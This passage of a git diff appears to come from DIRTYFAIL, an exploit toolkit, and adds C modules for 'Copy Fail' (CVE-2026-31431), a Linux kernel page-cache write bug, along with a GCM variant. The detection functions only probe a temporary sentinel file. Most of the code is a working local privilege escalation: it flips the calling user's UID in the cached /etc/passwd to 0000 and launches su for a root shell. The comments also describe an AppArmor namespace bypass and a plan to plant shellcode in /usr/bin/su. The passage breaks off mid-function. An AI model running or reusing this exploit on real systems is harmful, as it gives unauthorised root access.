*/ + unsigned char auth[32] = {0}, enc[16] = {0}; + unsigned char keyblob[8 + 32 + 16]; + size_t keylen = build_authenc_keyblob(keyblob, auth, 32, enc, 16); + if (setsockopt(master, SOL_ALG, ALG_SET_KEY, keyblob, keylen) < 0) { + close(master); + return -1; + } + + int op = accept(master, NULL, NULL); + int saved = errno; + close(master); + errno = saved; + return op; +} + +/* ---------------------------------------------------------------- * + * af_alg_send_aad() + * + * Sends per-op control messages (decrypt, IV, assoclen=8) plus the + * AAD itself with MSG_MORE. AAD layout: + * + * bytes 0..3 SPI (we leave zero β€” the kernel doesn't care) + * bytes 4..7 seqno_lo (this is the 4 bytes that get STOREd) + * + * Returns true on success. + * ---------------------------------------------------------------- */ +static bool af_alg_send_aad(int op, const unsigned char four_bytes[4]) +{ + unsigned char aad[ASSOCLEN] = { 0 }; + memcpy(aad + 4, four_bytes, 4); + + unsigned int op_decrypt = ALG_OP_DECRYPT; + unsigned int assoclen = ASSOCLEN; + unsigned char iv[20]; /* u32 ivlen + 16-byte IV */ + *(uint32_t *)iv = 16; + memset(iv + 4, 0, 16); + + /* CMSG_SPACE values for: ALG_SET_OP(u32), ALG_SET_IV(u32+16), ALG_SET_ASSOCLEN(u32). 
*/ + union { + char buf[CMSG_SPACE(sizeof(unsigned int)) + + CMSG_SPACE(20) + + CMSG_SPACE(sizeof(unsigned int))]; + struct cmsghdr align; + } ctrl; + memset(&ctrl, 0, sizeof(ctrl)); + + struct iovec iov = { .iov_base = aad, .iov_len = ASSOCLEN }; + struct msghdr msg = { + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = ctrl.buf, + .msg_controllen = sizeof(ctrl.buf), + }; + + struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); + cm->cmsg_len = CMSG_LEN(sizeof(unsigned int)); + cm->cmsg_level = SOL_ALG; + cm->cmsg_type = ALG_SET_OP; + memcpy(CMSG_DATA(cm), &op_decrypt, sizeof(op_decrypt)); + + cm = CMSG_NXTHDR(&msg, cm); + cm->cmsg_len = CMSG_LEN(20); + cm->cmsg_level = SOL_ALG; + cm->cmsg_type = ALG_SET_IV; + memcpy(CMSG_DATA(cm), iv, 20); + + cm = CMSG_NXTHDR(&msg, cm); + cm->cmsg_len = CMSG_LEN(sizeof(unsigned int)); + cm->cmsg_level = SOL_ALG; + cm->cmsg_type = ALG_SET_AEAD_ASSOCLEN; + memcpy(CMSG_DATA(cm), &assoclen, sizeof(assoclen)); + + return sendmsg(op, &msg, MSG_MORE) >= 0; +} + +/* ---------------------------------------------------------------- * + * cf_4byte_write() + * + * The whole primitive in one function: open the target, force its + * page into the cache, set up an AF_ALG op socket, send AAD with our + * controlled 4 bytes, splice 32 bytes from the target file into the + * op socket (the kernel uses those page-cache pages as the *destination* + * of the in-place AEAD), then drive the op via recv() so that the + * scratch-write fires. + * + * `four_bytes` lands at file offset `target_off` of the cached page. + * Returns true on success (with errno cleared) β€” but "success" here + * just means "the syscalls completed". Whether the write actually + * landed must be confirmed by the caller via a read-back. 
+ * ---------------------------------------------------------------- */ +bool cf_4byte_write(const char *target_path, + off_t target_off, + const unsigned char four_bytes[4]) +{ + int target_fd = open_and_cache(target_path); + if (target_fd < 0) { + log_bad("open %s: %s", target_path, strerror(errno)); + return false; + } + + int op = af_alg_setup_socket(); + if (op < 0) { + log_bad("AF_ALG setup: %s", strerror(errno)); + close(target_fd); + return false; + } + + if (!af_alg_send_aad(op, four_bytes)) { + log_bad("sendmsg AAD: %s", strerror(errno)); + close(op); close(target_fd); + return false; + } + + int pipefd[2]; + if (pipe(pipefd) < 0) { + log_bad("pipe: %s", strerror(errno)); + close(op); close(target_fd); + return false; + } + + /* file -> pipe: 32 bytes from offset target_off (CRYPTLEN+TAGLEN). */ + off_t off = target_off; + ssize_t n1 = splice(target_fd, &off, pipefd[1], NULL, SPLICE_LEN, 0); + if (n1 != SPLICE_LEN) { + log_bad("splice file->pipe: got %zd want %d (%s)", + n1, SPLICE_LEN, strerror(errno)); + close(pipefd[0]); close(pipefd[1]); close(op); close(target_fd); + return false; + } + + /* pipe -> op socket: kernel now has page-cache pages in dst SGL. */ + ssize_t n2 = splice(pipefd[0], NULL, op, NULL, SPLICE_LEN, 0); + close(pipefd[0]); close(pipefd[1]); + if (n2 != SPLICE_LEN) { + log_bad("splice pipe->op: got %zd want %d (%s)", + n2, SPLICE_LEN, strerror(errno)); + close(op); close(target_fd); + return false; + } + + /* Drive the AEAD. recv will fail with EBADMSG (auth check fails on + * our zero key + zero ciphertext); the scratch write has already + * happened by then. */ + unsigned char drain[256]; + ssize_t r = recv(op, drain, sizeof(drain), 0); + int saved = errno; + (void)r; + close(op); + close(target_fd); + errno = (saved == EBADMSG || saved == EINVAL || r >= 0) ? 
0 : saved; + return errno == 0; +} + +/* ---------------------------------------------------------------- * + * Detection + * ---------------------------------------------------------------- */ + +df_result_t copyfail_detect(void) +{ + log_step("Copy Fail (CVE-2026-31431) β€” detection"); + + int km = -1, kn = -1; + if (kernel_version(&km, &kn)) + log_hint("kernel %d.%d.x (affected lines: 6.12, 6.17, 6.18)", km, kn); + + /* Probe AF_ALG availability and instantiation of authencesn. */ + int probe = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (probe < 0) { + log_ok("AF_ALG socket family unavailable (%s) β€” NOT vulnerable", + strerror(errno)); + return DF_PRECOND_FAIL; + } + struct sockaddr_alg_compat sa = { .salg_family = AF_ALG }; + strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1); + strncpy((char *)sa.salg_name, ALG_NAME, sizeof(sa.salg_name) - 1); + if (bind(probe, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + log_ok("authencesn template not loadable (%s) β€” NOT vulnerable", + strerror(errno)); + close(probe); + return DF_PRECOND_FAIL; + } + close(probe); + log_ok("AF_ALG + %s loadable", ALG_NAME); + + /* Sentinel file probe. */ + char tmpl[] = "/tmp/copyfail-sentinel.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { + log_bad("mkstemp: %s", strerror(errno)); + return DF_TEST_ERROR; + } + unsigned char sentinel[PAGE]; + for (size_t i = 0; i < PAGE; i += 32) + memcpy(sentinel + i, "COPYFAIL-SENTINEL-UNCORRUPTED!!\n", 32); + if (write(sfd, sentinel, PAGE) != PAGE) { + log_bad("sentinel write: %s", strerror(errno)); + close(sfd); unlink(tmpl); + return DF_TEST_ERROR; + } + close(sfd); + + log_step("triggering primitive against %s with marker '%s'", + tmpl, MARKER_STR); + if (!cf_4byte_write(tmpl, 0, (const unsigned char *)MARKER_STR)) { + unlink(tmpl); + return DF_TEST_ERROR; + } + + /* Re-read the sentinel via a fresh fd (page cache, not disk). 
*/ + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + unsigned char after[PAGE]; + ssize_t got = read(rfd, after, PAGE); + close(rfd); + unlink(tmpl); + if (got != PAGE) return DF_TEST_ERROR; + + /* Look for the marker. We expect it to land somewhere inside the + * 32-byte spliced region (offsets 0..31). */ + unsigned char *hit = memmem(after, 32, MARKER_STR, 4); + bool orig_has_marker = memmem(sentinel, 32, MARKER_STR, 4) != NULL; + if (hit && !orig_has_marker) { + size_t off = hit - after; + log_warn("VULNERABLE β€” marker '%s' landed at sentinel offset %zu", + MARKER_STR, off); + log_warn("apply the upstream fix (commit a664bf3d or distro backport)"); + log_warn("interim mitigation: blacklist the algif_aead module"); + return DF_VULNERABLE; + } + + /* Sometimes the layout puts the scratch write outside the first + * 32 bytes; check the whole page for ANY divergence. */ + size_t diff_count = 0, first_diff = (size_t)-1; + for (size_t i = 0; i < PAGE; i++) { + if (after[i] != sentinel[i]) { + if (first_diff == (size_t)-1) first_diff = i; + diff_count++; + } + } + if (diff_count > 0) { + log_warn("page cache MODIFIED (%zu bytes changed, first at offset %zu)", + diff_count, first_diff); + log_warn("the marker layout differs but the underlying bug class " + "still allowed a page-cache page into the AEAD dst SGL"); + return DF_VULNERABLE; + } + + log_ok("page cache intact β€” NOT vulnerable on this kernel"); + return DF_OK; +} + +/* ---------------------------------------------------------------- * + * Exploit + * ---------------------------------------------------------------- */ + +df_result_t copyfail_exploit(bool do_shell) +{ + log_step("Copy Fail (CVE-2026-31431) β€” exploit"); + + /* Resolve the calling user. We deliberately do not exploit as + * root or for arbitrary users β€” only the user who ran us. 
*/ + uid_t uid = getuid(); + if (uid == 0) { + log_warn("already root β€” nothing to escalate"); + return DF_OK; + } + struct passwd *pw = getpwuid(uid); + if (!pw) { + log_bad("getpwuid(%u): %s", uid, strerror(errno)); + return DF_TEST_ERROR; + } + const char *user = pw->pw_name; + log_step("target user: %s (uid %u)", user, uid); + + off_t uid_off = 0; + size_t uid_len = 0; + char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("could not find %s in /etc/passwd", user); + return DF_TEST_ERROR; + } + log_step("/etc/passwd: UID field at offset %lld = '%s' (%zu chars)", + (long long)uid_off, uid_str, uid_len); + + if (uid_len != 4) { + log_bad("this technique needs a 4-digit UID; got '%s' (%zu chars)", + uid_str, uid_len); + log_hint("either pick a different user with a 4-digit UID, or use " + "the multi-shot variant (not implemented in DIRTYFAIL)."); + return DF_TEST_ERROR; + } + + log_warn("about to flip /etc/passwd page cache: '%s' -> '0000'", uid_str); + log_warn("on-disk file is unchanged. cleanup options:"); + log_warn(" 1) DIRTYFAIL --cleanup (POSIX_FADV_DONTNEED + drop_caches)"); + log_warn(" 2) echo 3 > /proc/sys/vm/drop_caches (from root)"); + log_warn(" 3) reboot"); + if (!typed_confirm("DIRTYFAIL")) { + log_bad("confirmation declined β€” aborting"); + return DF_OK; + } + if (!ssh_lockout_check(user)) { + log_bad("SSH-lockout confirmation declined β€” aborting"); + return DF_OK; + } + + log_step("issuing 4-byte page-cache write..."); + if (!cf_4byte_write("/etc/passwd", uid_off, + (const unsigned char *)"0000")) { + log_bad("primitive failed"); + return DF_EXPLOIT_FAIL; + } + + /* Verify via a fresh read against the page cache. 
*/ + int v = open("/etc/passwd", O_RDONLY); + if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } + if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; } + char land[5] = {0}; + if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; } + close(v); + if (memcmp(land, "0000", 4) != 0) { + log_bad("write did not land β€” page cache reads '%.4s'", land); + return DF_EXPLOIT_FAIL; + } + log_ok("page cache now reports %s with uid 0", user); + + /* Sanity check via libc β€” getpwnam() walks NSS, which on most + * systems hits files first, so this should agree with our patch. */ + struct passwd *p = getpwnam(user); + if (p) log_step("getpwnam('%s').pw_uid = %u", user, p->pw_uid); + + if (!do_shell) { + if (dirtyfail_no_revert) { + log_warn("--no-revert: leaving page cache poisoned (run " + "`dirtyfail --cleanup` or reboot to revert)"); + return DF_EXPLOIT_OK; + } + log_hint("--no-shell selected; reverting page cache"); + if (try_revert_passwd_page_cache()) + log_ok("page cache reverted"); + else + log_warn("page cache may still be modified β€” `sudo dirtyfail --cleanup` or reboot"); + return DF_EXPLOIT_OK; + } + + log_ok("invoking 'su %s' β€” enter your own password to drop into a root shell", + user); + log_hint("after exit, run DIRTYFAIL --cleanup or reboot"); + execlp("su", "su", user, (char *)NULL); + log_bad("execlp su: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} diff --git a/modules/copy_fail_family/copyfail.h b/modules/copy_fail_family/copyfail.h new file mode 100644 index 0000000..90a012a --- /dev/null +++ b/modules/copy_fail_family/copyfail.h @@ -0,0 +1,33 @@ +/* + * DIRTYFAIL β€” copyfail.h + * + * Public surface for the Copy Fail (CVE-2026-31431) module. + */ + +#ifndef DIRTYFAIL_COPYFAIL_H +#define DIRTYFAIL_COPYFAIL_H + +#include "common.h" + +/* Run all preflight checks and the sentinel-file primitive probe. + * Never modifies system files. 
*/ +df_result_t copyfail_detect(void); + +/* Real PoC: flip the running user's 4-digit UID in /etc/passwd page + * cache to "0000" and (optionally) execve `su ` to drop a root + * shell. `do_shell` controls whether to invoke su; if false, the patch + * is reverted via POSIX_FADV_DONTNEED before returning so the system + * does not stay in a broken state. */ +df_result_t copyfail_exploit(bool do_shell); + +/* Low-level building block: write 4 bytes into the page cache of + * `target_path` at `target_off`. Caller must have read access to + * the file. Same primitive that copyfail_exploit uses internally; + * exposed for exploit_su.c to chain ~12 calls into a 48-byte + * shellcode plant against /usr/bin/su. Returns true if the AF_ALG + * sequence completed; caller MUST verify via re-read. */ +bool cf_4byte_write(const char *target_path, + off_t target_off, + const unsigned char four_bytes[4]); + +#endif diff --git a/modules/copy_fail_family/copyfail_gcm.c b/modules/copy_fail_family/copyfail_gcm.c new file mode 100644 index 0000000..22fcdc4 --- /dev/null +++ b/modules/copy_fail_family/copyfail_gcm.c @@ -0,0 +1,634 @@ +/* + * DIRTYFAIL β€” copyfail_gcm.c + * + * See copyfail_gcm.h for the design notes. This file implements: + * + * 1. AES-GCM keystream byte 0 computation via AF_ALG `gcm(aes)`. + * 2. IV brute force until keystream[0] equals the desired XOR mask. + * 3. SA installation via `ip xfrm state add ...` (system(3) β€” saves + * ~150 lines of netlink boilerplate vs. our authencesn path; the + * gcm primitive is the right place to take that dep, and every + * modern distro ships iproute2). + * 4. Splice trigger: ESP wire header (16B) + 1 target byte + 16-byte + * ICV pad. The kernel's in-place GCM decrypt XORs keystream[0] + * onto the spliced page-cache byte, which is what we control. 
+ */ + +#include "copyfail_gcm.h" +#include "apparmor_bypass.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include + +extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, + size_t len, unsigned int flags); +#endif + +#ifndef UDP_ENCAP +#define UDP_ENCAP 100 +#endif +#ifndef UDP_ENCAP_ESPINUDP +#define UDP_ENCAP_ESPINUDP 2 +#endif + +#define ENCAP_PORT 4500 +#define ESP_SPI 0xCAFEBABE +#define IV_LEN 8 +#define ICV_LEN 16 +#define AES_KEY_LEN 16 +#define SALT_LEN 4 +#define KEY_TOTAL (AES_KEY_LEN + SALT_LEN) /* rfc4106 expects 20 */ + +/* Fixed AEAD key (16-byte AES key + 4-byte salt). Both are attacker- + * chosen β€” auth verification will fail at the end of decrypt anyway, + * the STORE has already happened by then. */ +__attribute__((unused)) +static const unsigned char AEAD_KEY[KEY_TOTAL] = { + 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, + 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, + 0x10, 0x11, 0x12, 0x13, +}; + +/* ---------------------------------------------------------------- * + * Detection + * ---------------------------------------------------------------- */ + +df_result_t copyfail_gcm_detect(void) +{ + log_step("Copy Fail GCM variant β€” detection"); + + int km, kn; + if (kernel_version(&km, &kn)) + log_hint("kernel %d.%d.x", km, kn); + + /* Probe AF_ALG availability of rfc4106(gcm(aes)). 
*/ + int s = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (s < 0) { + log_ok("AF_ALG unavailable β€” GCM variant unreachable"); + return DF_PRECOND_FAIL; + } + struct sockaddr_alg_compat sa = { .salg_family = AF_ALG }; + strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1); + strncpy((char *)sa.salg_name, "rfc4106(gcm(aes))", sizeof(sa.salg_name) - 1); + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + log_ok("rfc4106(gcm(aes)) not loadable β€” GCM variant unreachable"); + close(s); + return DF_PRECOND_FAIL; + } + close(s); + log_ok("AF_ALG + rfc4106(gcm(aes)) loadable"); + + bool userns = unprivileged_userns_allowed(); + log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED"); + + if (!userns) { + log_warn("preconditions partial β€” userns blocked. Try with --aa-bypass."); + return DF_PRECOND_FAIL; + } + + if (apparmor_userns_caps_blocked()) { + log_ok("LSM-mitigated β€” unprivileged userns lacks caps; xfrm SA install " + "via `ip xfrm` requires CAP_NET_ADMIN that the AA policy denies."); + return DF_PRECOND_FAIL; + } + + if (dirtyfail_active_probes) { + log_step("--active set: firing rfc4106(gcm) trigger against /tmp sentinel"); + df_result_t pr = copyfail_gcm_active_probe(); + if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr; + log_warn("active probe inconclusive β€” falling back to precondition verdict"); + } + + log_warn("VULNERABLE β€” GCM-variant of xfrm-ESP page-cache write reachable"); + log_warn("apply mainline patch f4c50a4034e6 or distro backport"); + log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe"); + return DF_VULNERABLE; +} + +/* ---------------------------------------------------------------- * + * AES-GCM keystream byte 0 β€” computed via AF_ALG `ecb(aes)` instead + * of `aead gcm(aes)`. 
+ * + * BACKGROUND + * ---------- + * Originally we used AF_ALG `aead` `gcm(aes)`: bind, set key + tag size, + * sendmsg with assoclen=0 + 1-byte zero plaintext, read back 17 bytes + * of (ciphertext || tag). The first byte of the output IS the keystream + * byte we want (since pt=0 means ct = ks XOR 0 = ks). + * + * That worked in unit tests on some kernels but on Ubuntu 24.04 / 6.8 + * the read() blocks indefinitely β€” the 1-byte AEAD plaintext doesn't + * produce output until additional data is sent or the socket is shut + * down. Tracking down the exact "what does this kernel want" was a rat + * hole. + * + * Instead, we compute keystream byte 0 directly. Per NIST SP 800-38D, + * GCM with a 12-byte nonce derives the initial counter as + * J0 = nonce || 0x00000001 + * and the counter for the first plaintext block is J0 + 1 = + * nonce || 0x00000002 + * The keystream block is E_K(that counter), so: + * keystream[0] = AES-128-ECB(K, nonce || 0x00000002)[0] + * + * AF_ALG `ecb(aes)` is bulletproof β€” single-block in, single-block out, + * no MSG_MORE / shutdown semantics to get wrong. ~6 Β΅s per call on a + * 4-core VM, vs ~50 Β΅s for the AEAD path that didn't actually work. + * + * (cf2's copyfail2.c uses OpenSSL EVP_aes_128_gcm to do the same + * computation indirectly. We avoid the libssl dependency by going + * through AF_ALG ECB directly.) 
+ * ---------------------------------------------------------------- */ + +#ifdef __linux__ + +static int gcm_open(void) +{ + int s = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (s < 0) return -1; + struct sockaddr_alg_compat sa = { .salg_family = AF_ALG }; + strncpy((char *)sa.salg_type, "skcipher", sizeof(sa.salg_type) - 1); + strncpy((char *)sa.salg_name, "ecb(aes)", sizeof(sa.salg_name) - 1); + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + close(s); return -1; + } + if (setsockopt(s, SOL_ALG, ALG_SET_KEY, + AEAD_KEY, AES_KEY_LEN) < 0) { /* AES-128 key */ + close(s); return -1; + } + return s; +} + +/* Compute byte 0 of the GCM keystream for the given 12-byte nonce by + * ECB-encrypting the counter block (nonce || 0x00000002). */ +static bool gcm_keystream_byte0(int ecb_s, const uint8_t nonce[12], + uint8_t *out_byte) +{ + int op = accept(ecb_s, NULL, NULL); + if (op < 0) return false; + + /* Counter block: J0 + 1 = nonce(12) || 0x00000002. The +1 is + * because GCM reserves J0 itself for the auth-tag XOR, so the + * first plaintext block uses J0+1. */ + uint8_t block[16]; + memcpy(block, nonce, 12); + block[12] = 0; block[13] = 0; block[14] = 0; block[15] = 2; + + char cbuf[CMSG_SPACE(sizeof(unsigned int))] = {0}; + unsigned int op_enc = ALG_OP_ENCRYPT; + + struct msghdr msg = { .msg_control = cbuf, .msg_controllen = sizeof(cbuf) }; + struct cmsghdr *c = CMSG_FIRSTHDR(&msg); + c->cmsg_level = SOL_ALG; + c->cmsg_type = ALG_SET_OP; + c->cmsg_len = CMSG_LEN(sizeof(unsigned int)); + memcpy(CMSG_DATA(c), &op_enc, sizeof(op_enc)); + + struct iovec iov = { .iov_base = block, .iov_len = 16 }; + msg.msg_iov = &iov; msg.msg_iovlen = 1; + + if (sendmsg(op, &msg, 0) != 16) { close(op); return false; } + + uint8_t out[16]; + ssize_t n = read(op, out, 16); + close(op); + if (n != 16) return false; + *out_byte = out[0]; + return true; +} + +/* Brute force IV until keystream byte equals want_ks. Returns iters + * tried; writes the winning 8-byte IV into iv_out. 
*/ +static int64_t gcm_brute_iv(uint8_t want_ks, uint8_t iv_out[IV_LEN]) +{ + int s = gcm_open(); + if (s < 0) { + log_bad("gcm_open: %s", strerror(errno)); + return -1; + } + uint8_t nonce[12]; + memcpy(nonce, AEAD_KEY + AES_KEY_LEN, SALT_LEN); /* salt prefix */ + + for (uint64_t v = 1; v < (1ULL << 32); v++) { + memcpy(nonce + SALT_LEN, &v, IV_LEN); /* low 8 bytes */ + uint8_t ks; + if (!gcm_keystream_byte0(s, nonce, &ks)) { + close(s); + return -1; + } + if (ks == want_ks) { + memcpy(iv_out, &v, IV_LEN); + close(s); + return (int64_t)v; + } + if ((v & 0xFFF) == 0 && v > 16384) { + /* progress hint after 16k attempts (very unlucky case). */ + log_hint("gcm IV brute: %llu trials so far...", + (unsigned long long)v); + } + } + close(s); + return -1; +} + +/* ---------------------------------------------------------------- * + * SA install via `ip xfrm state add ...` + * ---------------------------------------------------------------- */ + +static bool ip_run(const char *fmt, ...) +{ + char cmd[2048]; + va_list ap; + va_start(ap, fmt); + vsnprintf(cmd, sizeof(cmd), fmt, ap); + va_end(ap); + int rc = system(cmd); + return rc == 0; +} + +static bool gcm_install_sa(const uint8_t iv[IV_LEN]) +{ + char keyhex[KEY_TOTAL * 2 + 3]; + char *p = keyhex; + p += sprintf(p, "0x"); + for (int i = 0; i < KEY_TOTAL; i++) + p += sprintf(p, "%02x", AEAD_KEY[i]); + + /* `ip xfrm state add` registers a transport-mode ESP SA over + * loopback with rfc4106(gcm(aes)) AEAD. Encap is ESPINUDP/4500 + * matching what we'll send via splice. */ + (void)iv; /* IV travels in the wire packet, not the SA. 
*/ + return ip_run( + "ip link set lo up >/dev/null 2>&1 ; " + "ip xfrm state flush >/dev/null 2>&1 ; " + "ip xfrm state add src 127.0.0.1 dst 127.0.0.1 proto esp " + "spi 0x%08x encap espinudp %d %d 0.0.0.0 " + "aead 'rfc4106(gcm(aes))' %s 128 replay-window 32 >/dev/null 2>&1", + ESP_SPI, ENCAP_PORT, ENCAP_PORT, keyhex); +} + +/* ---------------------------------------------------------------- * + * Splice trigger + * ---------------------------------------------------------------- */ + +static bool gcm_trigger(const char *target_path, off_t target_off, + const uint8_t iv[IV_LEN]) +{ + int rs = socket(AF_INET, SOCK_DGRAM, 0); + if (rs < 0) return false; + int encap = UDP_ENCAP_ESPINUDP; + setsockopt(rs, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)); + struct sockaddr_in la = { + .sin_family = AF_INET, + .sin_port = htons(ENCAP_PORT), + .sin_addr.s_addr = htonl(INADDR_LOOPBACK), + }; + int reuse = 1; + setsockopt(rs, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)); + if (bind(rs, (struct sockaddr *)&la, sizeof(la)) < 0) { + close(rs); return false; + } + + /* Build attacker page in /tmp: ESP header(16) + ICV pad at offset + * 4096. We splice these from a real file so the kernel sees them + * as page-cache pages on the splice path. 
*/ + char atkpath[64]; + snprintf(atkpath, sizeof(atkpath), "/tmp/dirtyfail-gcm.%d", (int)getpid()); + unlink(atkpath); + int afd = open(atkpath, O_RDWR | O_CREAT | O_EXCL, 0600); + if (afd < 0) { close(rs); return false; } + + unsigned char esp_hdr[16]; + *(uint32_t *)(esp_hdr + 0) = htonl(ESP_SPI); + *(uint32_t *)(esp_hdr + 4) = htonl(1); /* SeqNum */ + memcpy(esp_hdr + 8, iv, IV_LEN); + if (pwrite(afd, esp_hdr, 16, 0) != 16) goto fail; + + unsigned char icv[ICV_LEN] = {0}; + if (pwrite(afd, icv, ICV_LEN, 4096) != ICV_LEN) goto fail; + fsync(afd); +#ifdef POSIX_FADV_DONTNEED + posix_fadvise(afd, 0, 0, POSIX_FADV_DONTNEED); +#endif + + int afd2 = open(atkpath, O_RDONLY); + if (afd2 < 0) goto fail; + unlink(atkpath); + + int tfd = open(target_path, O_RDONLY); + if (tfd < 0) { close(afd2); goto fail; } + + int p[2]; + if (pipe(p) < 0) { close(afd2); close(tfd); goto fail; } + fcntl(p[0], F_SETPIPE_SZ, 1 << 20); + fcntl(p[1], F_SETPIPE_SZ, 1 << 20); + + /* esp_hdr (16) || target_byte (1) || icv_pad (16) β€” 33 bytes total. */ + loff_t off; + off = 0; if (splice(afd2, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) goto trig_fail; + off = target_off; if (splice(tfd, &off, p[1], NULL, 1, SPLICE_F_MOVE) != 1) goto trig_fail; + off = 4096; if (splice(afd2, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) goto trig_fail; + + int ss = socket(AF_INET, SOCK_DGRAM, 0); + if (ss < 0) goto trig_fail; + if (connect(ss, (struct sockaddr *)&la, sizeof(la)) < 0) { close(ss); goto trig_fail; } + ssize_t sent = splice(p[0], NULL, ss, NULL, 16 + 1 + 16, SPLICE_F_MOVE); + (void)sent; + close(ss); + close(p[0]); close(p[1]); + + /* Wait for esp_input to finish the in-place STORE before we + * tear down sockets. 150ms matches V4bel's reference; 50ms was + * working on x86 lab kernels but tight on ARM64 / loaded VMs. 
*/ + usleep(150 * 1000); + unsigned char drain[256]; + (void)recv(rs, drain, sizeof(drain), MSG_DONTWAIT); + + close(afd2); close(tfd); close(afd); close(rs); + return true; + +trig_fail: + close(p[0]); close(p[1]); close(afd2); close(tfd); +fail: + close(afd); close(rs); + unlink(atkpath); + return false; +} + +/* ---------------------------------------------------------------- * + * Public 1-byte primitive + * ---------------------------------------------------------------- */ + +bool cfg_1byte_write(const char *target_path, + off_t target_off, unsigned char want_byte) +{ + /* Read current byte. */ + int tfd = open(target_path, O_RDONLY); + if (tfd < 0) { + log_bad("open %s: %s", target_path, strerror(errno)); + return false; + } + unsigned char cur = 0; + if (pread(tfd, &cur, 1, target_off) != 1) { + log_bad("pread current: %s", strerror(errno)); + close(tfd); return false; + } + close(tfd); + + if (cur == want_byte) { + return true; /* already what we want */ + } + + uint8_t want_ks = cur ^ want_byte; + + log_step("cfg_1byte_write off=%lld 0x%02x -> 0x%02x (need_ks=0x%02x)", + (long long)target_off, cur, want_byte, want_ks); + + /* Brute force IV via AF_ALG. */ + uint8_t iv[IV_LEN]; + int64_t iters = gcm_brute_iv(want_ks, iv); + if (iters < 0) { + log_bad("gcm IV brute force failed (want_ks=0x%02x)", want_ks); + return false; + } + log_step(" IV found in %lld iters", (long long)iters); + + /* Install SA. */ + if (!gcm_install_sa(iv)) { + log_bad("ip xfrm state add failed"); + return false; + } + log_step(" SA installed"); + + /* Trigger. */ + if (!gcm_trigger(target_path, target_off, iv)) { + log_bad("gcm trigger failed"); + return false; + } + log_step(" trigger fired"); + + /* Verify. 
*/ + int v = open(target_path, O_RDONLY); + if (v < 0) return false; + unsigned char post = 0; + if (pread(v, &post, 1, target_off) != 1) { close(v); return false; } + close(v); + if (post != want_byte) { + log_bad("byte at off=%lld is 0x%02x, wanted 0x%02x", + (long long)target_off, post, want_byte); + return false; + } + return true; +} + +#else /* !__linux__ */ +bool cfg_1byte_write(const char *p, off_t o, unsigned char b) +{ (void)p; (void)o; (void)b; return false; } +#endif + +/* ---------------------------------------------------------------- * + * Top-level exploit (UID flip end-to-end) + * ---------------------------------------------------------------- */ + +/* INNER (bypass userns): cfg_1byte_write Γ— 4 to flip UID digits to '0'. */ +df_result_t copyfail_gcm_exploit_inner(void) +{ +#ifdef __linux__ + const char *user = getenv("DIRTYFAIL_TARGET_USER"); + if (!user || !*user) { + log_bad("inner: DIRTYFAIL_TARGET_USER not set"); + return DF_TEST_ERROR; + } + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("inner: find_passwd_uid_field('%s') failed", user); + return DF_TEST_ERROR; + } + if (uid_len != 4) { + log_bad("inner: UID '%s' not 4 chars", uid_str); + return DF_TEST_ERROR; + } + for (size_t i = 0; i < 4; i++) { + if (uid_str[i] == '0') continue; + log_step("inner: flip /etc/passwd[%lld] '%c' -> '0'", + (long long)(uid_off + i), uid_str[i]); + if (!cfg_1byte_write("/etc/passwd", uid_off + i, '0')) { + log_bad("inner: byte flip failed at offset %lld", + (long long)(uid_off + i)); + return DF_EXPLOIT_FAIL; + } + } + return DF_EXPLOIT_OK; +#else + return DF_TEST_ERROR; +#endif +} + +/* OUTER (init ns): prompts β†’ fork bypass child β†’ wait β†’ verify β†’ su. 
*/ +df_result_t copyfail_gcm_exploit(bool do_shell) +{ + log_step("Copy Fail GCM variant β€” exploit"); + + uid_t target_uid = getuid(); + if (target_uid == 0) { + log_warn("already root in init namespace"); + return DF_OK; + } + + struct passwd *pw = getpwuid(target_uid); + if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; } + const char *user = pw->pw_name; + + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("user %s not found in /etc/passwd", user); + return DF_TEST_ERROR; + } + log_step("/etc/passwd UID for %s: '%s' at offset %lld", + user, uid_str, (long long)uid_off); + if (uid_len != 4) { + log_bad("UID '%s' is %zu chars; need 4", uid_str, uid_len); + return DF_TEST_ERROR; + } + + log_warn("about to flip /etc/passwd UID via rfc4106(gcm(aes)) byte-flips"); + log_warn("(four 1-byte writes β€” one per UID digit not already '0')"); + if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; } + if (!ssh_lockout_check(user)) { log_bad("ssh-lockout declined"); return DF_OK; } + + setenv("DIRTYFAIL_INNER_MODE", "gcm", 1); + 